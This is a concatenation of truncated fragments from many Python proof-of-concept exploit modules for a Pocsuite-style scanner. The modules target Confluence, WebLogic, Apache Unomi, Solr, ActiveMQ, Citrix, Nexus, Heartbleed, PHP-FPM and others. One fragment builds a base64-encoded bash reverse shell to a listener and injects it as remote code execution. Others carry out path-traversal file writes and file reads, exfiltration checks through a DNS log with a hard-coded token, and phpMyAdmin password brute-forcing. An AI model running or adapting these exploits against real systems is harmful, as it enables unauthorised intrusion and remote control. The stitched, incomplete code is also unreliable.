target_url = vul_url if self.is_vulnerable(): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = target_url return self.save_output(result) return self.save_output(result) def is_vulnerable(self): #TODO return True # 攻击模块 def _attack(self): return self._verify() # 输出报告 def save_output(self, result): output = Output(self) if result: output.success(result) else: output.fail() return output # 注册类 register_poc(Confluence_3396_POC) register_poc(Confluence_3398_POC) #register_poc(Confluence_3394_POC)
'Cookie': "sidebar_collapsed=false", 'Connection': "close", 'Upgrade-Insecure-Requests': "1", 'Content-Type': "text/xml", 'Content-Length': "1001", 'cache-control': "no-cache" } try: requests.post(veri_url, data=payload, headers=headers) res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns') if cmd in res.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = veri_url result['VerifyInfo']['Payload'] = payload except Exception as e: logger.warn(str(e)) return self.parse_output(result) def _attack(self): return self._verify() def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output register_poc(WebLogicWlsAsyncRCE)
PORT = get_listener_port() # IP = yourlistenerip # PORT = yourlistenerport payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1' payload = 'bash -c {echo,' + (base64.b64encode( payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}' pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\" ' + payload + '\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}' try: r2 = requests.post(url=pocurl, headers=pocheaders, data=pocjson, verify=False) #执行ping指令 except Exception as e: logger.warn(str(e)) return self.parse_attack(result) #自定义输出函数,调用框架输出的实例Output def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail("not vulnerability") return output #注册PoC类,这样框架才知道这是PoC类 register_poc(ApacheUnomiCVE202013942POC1)
result['VerifyInfo']['URL'] = url #result['VerifyInfo']['POC'] = path except Exception as e: return return self.parse_output(result) def _attack(self): return self._verify() def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _shell(self): return def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output register_poc(testPOC)
result['VerifyInfo']['URL'] = url result['VerifyInfo']['body'] = data except Exception as e: return return self.parse_output(result) def _attack(self): return self._verify() def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _shell(self): return def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output register_poc(POC)
} return headers def _verify(self): result = {} payload = '\x2f\x7a\x61\x62\x62\x69\x78\x2f\x7a\x61\x62\x62\x69\x78\x2e\x70\x68\x70\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x2e\x76\x69\x65\x77\x26\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x69\x64\x3d\x31' try: target = self._get_url + payload response = requests.get(url=target, headers=self._headers) if 'Dashboard' in response.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Payload'] = payload except Exception as e: logger.info(e) return self.parse_output(result) def _attack(self): return self._verify() def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('Not vulnerability') return output register_poc(Zabbix)
def test_dnslog(self, url): resp = req.get(url) d = resp.json() try: name = d['data'][0]['name'] if self.BANNER in name: return True except Exception: return False # 攻击模块 def _attack(self): return self._verify() # 输出报告 def save_output(self, result): output = Output(self) if result: output.success(result) else: output.fail() return output # 注册类 register_poc(Solr_RCE_0193) register_poc(Solr_RCE_0192) register_poc(Solr_RCE_17558) register_poc(Solr_RCE_12409)
def test_dnslog(self, url): resp = req.get(url) d = resp.json() try: sub_domain = d['data'][0]['domain'] if self.BANNER in sub_domain: return True except Exception: return False def test_command(self, p_output): # 分别对应echo命令(Windows)的回显和id命令(*nix)的回显 return re.search(self.BANNER, p_output) or "uid=" in p_output # 攻击模块 def _attack(self): return self._verify() # 输出报告 def save_output(self, result): output = Output(self) if result: output.success(result) else: output.fail() return output # 注册类 register_poc(Solr_RCE_12409)
headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", } response = requests.get(url=vuln_url, headers=headers) if response.status_code == 200 and "c4ca4238a0b923820dcc509a6f75849b" in response.text: result['VerifyInfo'] = {} result['VerifyInfo']['Path'] = vuln_url return self.parse_output(result) else: return self.parse_output() def _verify(self): return self.POC_1() def _attack(self): return self.POC_1() def parse_output(self, result={}): output = Output(self) if result and len(result.keys()) != 0: output.success(result) else: output.fail('target is not vulnerable') return output register_poc(DemoPoc)
vulType = 'Unauthrized Access' desc = ''' Docker Remote API Unauthrized Access ''' def _verify(self): result = {} try: url = self.url + "/info" res = requests.get(url) if res.status_code == 200 and res.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url result['VerifyInfo']['Payload'] = url except Exception as e: logger.info(e) return self.parse_ouput(result) def _attack(self): return self._verify() def parse_ouput(self, result): output = Output(self) if result: output.success(result) else: output.fail('not docker vulnerability') return output register_poc(Docker)
t = resq.text t = t.replace('\n', '').replace('\r', '') print('output >>> ' + t) t = t.replace(" ", "") result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url result['VerifyInfo']['Name'] = t except Exception as e: return def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _shell(self): return def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output register_poc(rj_get_token)
try: resq = requests.get(url=url+payload) t = resq.text t = t.replace('\n', 't').replace('\r', '') print('输出文件内容 >>> '+t) t = t.replace(" ","") result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url result['VerifyInfo']['Name'] = t except Exception as e: return def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _shell(self): return def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output register_poc(OpenSNSPOC)
try: r2 = requests.post(url=pocurl, headers=headers, data=pocxml, verify=False) if r2.status_code == 200 and 'XML-RPC' in r2.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['extra'] = {} result['extra']['evidence'] = r2.text except Exception as e: logger.warn(str(e)) return self.parse_attack(result) def _attack(self): return self._verify() def _shell(self): return self._verify() def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail("not vulnerability") return output register_poc(ApacheOFBizCVE20209496POC)
content = re.search(r'server_cond=[\S\s]+?[\S\s]"', t).group() print('output >>> ' + content) t = t.replace(" ", "") result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url result['VerifyInfo']['Name'] = t except Exception as e: return def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _shell(self): return def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output register_poc(ZhongQingPOC)
filename = self.random_str(6) flag = "PUT /fileserver/sex../../..\\styles/%s.txt HTTP/1.0\r\nContent-Length: 9\r\n\r\nbig04dream\r\n\r\n" % ( filename) s.send(flag.encode()) s.recv(1024) s.close() url = 'http://' + ip + ":" + str( port) + '/styles/%s.txt' % (filename) res_html = requests.get(url).text if 'big04dream' in res_html: result["VerifyInfo"] = {} result['VerifyInfo']['IP'] = ip result['VerifyInfo']['Payload'] = flag except Exception as e: logger.info(e) return self.parse_output(result) def _attack(self): return self._verify() def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('not activemq vulnerability') return output register_poc(ActiveMQ)
# if zonetransfers: # print("\tZone transfers possible:") # for zone in zonetransfers: # print(zone) def _verify(self): result = {} pr = urlparse(self.url) target = '{}'.format(pr.hostname) # logger.info(target) zonetransfers_info = self.dns_zonetransfer(target) if zonetransfers_info: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = '{}'.format(pr.hostname) return self.parse_output(result) def _attack(self): return self._verify() def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('not vulnerability') return output register_poc(DNSPOC)
# print(url) try: res = self.safe_atk(base_url, True) # print(res) if res['chapsecrets'][0] == "OK": f = open("/tmp/res.json", 'a+') json.dump(res, f, indent=4, ensure_ascii=False) f.close() logger.info("Result saved in res.json") result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = base_url result['VerifyInfo']['SavePath'] = "/tmp/res.json" except Exception as ex: logger.error(str(ex)) return self.parse_output(result) def _attack(self): return self._verify() def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output register_poc(VigorPOC)
def _verify(self): result = {} # print(self.url) url = self.url # print(url) try: for username, password in self.get_word_list(): if self.pma_login(url, username.strip(), password.strip()): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Username'] = username.strip() result['VerifyInfo']['Password'] = password.strip() except Exception as ex: logger.error(str(ex)) return self.parse_output(result) def _attack(self): return self._verify() def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output register_poc(PmaBurstPOC)
category = POC_CATEGORY.PROTOCOL.HTTP def _verify(self): result = {} # print(self.url) url = self.url # print(url) try: resp = requests.get(url, verify=False, timeout=5) if resp.status_code != 404: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url result['VerifyInfo']['PoC'] = str(resp.status_code) except Exception as ex: logger.error(str(ex)) return self.parse_output(result) def _attack(self): return self._verify() def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output register_poc(HTTPXPOC)
break local_socket.send(self.malformed_heartbeat) return self.send_n_catch_heartbeat(local_socket) def _verify(self): result = {} try: host = self.url.split('//')[1] port = 443 if self.check_heardbeat(host=host.encode(), port=port): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = host result['VerifyInfo']['INFO'] = 'target %s vulnerability' % host except Exception as e: logger.info(e) return self.parse_output(result) def _attack(self): return self._verify() def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('not heartbleed vulnerability') return output register_poc(HeartBleed)
def _verify(self): result = {} payload = 'ws_utc/resources/setting/options/general' try: if self.url[-1] == '/': url = self.url + payload else: url = self.url + '/' + payload response = requests.get(url=url, headers=self._headers) if response.status_code != 404: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Payload'] = payload except Exception as e: logger.info(e) return self.parse_output(result) def _attack(self): return self._verify() def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output register_poc(Weblogic)
cmd2 = 'ping ' + cmd if self.upload_xml(cmd): xml_url = self.url + '/vpn/../vpns/portal/%s.xml' % 'bigdream' headers = {"NSC_USER": "******", "NSC_NONCE": "nsroot"} r = requests.get(xml_url, headers=headers, verify=False) if r.status_code == 200: res = requests.get( 'http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns' ) if cmd in res: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Payload'] = cmd2 except Exception as e: pass return self.parse_output(result) def _attack(self): return self._verify() def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('not vulnerability') return output register_poc(Citrix)
return _l_auth_headers # 验证EL表达式被执行 def test_EL(self, p_resp): d = p_resp.json() result = d['result']['errors']['roles'] logger.info(result) try: if str(self.ran_sum) in result: return True except Exception: return False # 攻击模块 def _attack(self): return self._verify() # 输出报告 def save_output(self, result): output = Output(self) if result: output.success(result) else: output.fail() return output register_poc(Nexus3_2020_10204_EL_INJECTION_POC)
except: pass return self.parse_output(result) @property def _headers(self): headers = { 'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0", 'Accept': "*/*", 'Content-Type': "application/json", 'X-Requested-With': "XMLHttpRequest", 'Connection': "close", 'Cache-Control': "no-cache" } return headers def _attack(self): return self._verify() def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('not vulnerability') return output register_poc(Nexus)
match_string = "Unknown column 'watch_dog' in 'field list'" if url_parse.query: qs = parse_qs(url_parse.query) for i in qs: query_list = [] query_list.append(i+'[]'+'='+'bind'+'&'+i+'[]'+'='+payload) for a in qs: if a == i: continue query_list.append(a+'='+qs[a][0]) query = '&'.join(query_list) url = url_parse.scheme+'://'+url_parse.netloc+url_parse.path+url_parse.params+'?'+query try: req = requests.get(url) if match_string in req.text: print(req.text) print("success") except Exception as e: pass def _attack(self): return self._verify() register_poc(Testpoc)
appPowerLink = '' appName = 'php-fpm and nginx' appVersion = 'all' vulType = 'rce' desc = ''' PHP-fpm 远程代码执行漏洞(CVE-2019-11043) ''' samples = [''] install_requires = [''] def _verify(self): result = {} test = PhpUip(self.url + '/index.php') if test.poc(): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_output(result) def _attack(self): return self._verify() def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('Not vulnerability') return output register_poc(PHPFPM)
"Referer": self.url + "/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&", "Content-Type": "application/json; charset=utf-8" } data = '{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename r = requests.post(paylaod, data=data, headers=headers) if r.status_code == 200 and "</web-app>" in r.text: m = re.search('<web-app[\s\S]+<\/web-app>', r.text) if m: content = m.group()[:limitSize] result['FileInfo'] = {} result['FileInfo']['Filename'] = filename result['FileInfo']['Content'] = content return self.parse_output(result) def _attack(self): return self._verify() def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output register_poc(DemoPOC)
str_resp_json = str(resp.json()) # 响应头为200 且json响应字符串包含columns和user,则认为查询成功 if resp.status_code == 200 and 'columns' in str_resp_json and 'user' in str_resp_json: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = target_url return self.save_output(result) return self.save_output(result) except Exception as e: print(e) traceback.print_stack() return self.save_output(result) #漏洞攻击 def _attack(self): return self._verify() def save_output(self, result): #判断有无结果并输出 output = Output(self) if result: output.success(result) else: output.fail() return output register_poc(InfluxDB_POC)
pr = urlparse(self.url) if pr.port: # and pr.port not in ports: ports = [pr.port] else: ports = [7001, 17001, 27001] for port in ports: uri = "{0}://{1}:{2}".format(pr.scheme, pr.hostname, str(port)) status, msg = check(pr.hostname, port) if status: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = uri result['extra'] = {} result['extra']['evidence'] = msg break return self.parse_output(result) def _attack(self): return self._verify() def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('not vulnerability') return output register_poc(TestPOC)
headers = {'Authorization': 'Basic' + ' ' + auth} return headers # 验证EL表达式被执行 def test_EL(self, p_resp): d = p_resp.json() result = d['result']['errors']['roles'] print(result) print(self.ran_sum) try: if str(self.ran_sum) in result: return True except Exception: return False # 攻击模块 def _attack(self): return self._verify() # 输出报告 def save_output(self, result): output = Output(self) if result: output.success(result) else: output.fail() return output register_poc(Nexus3_2018_16621_EL_INJECTION_POC)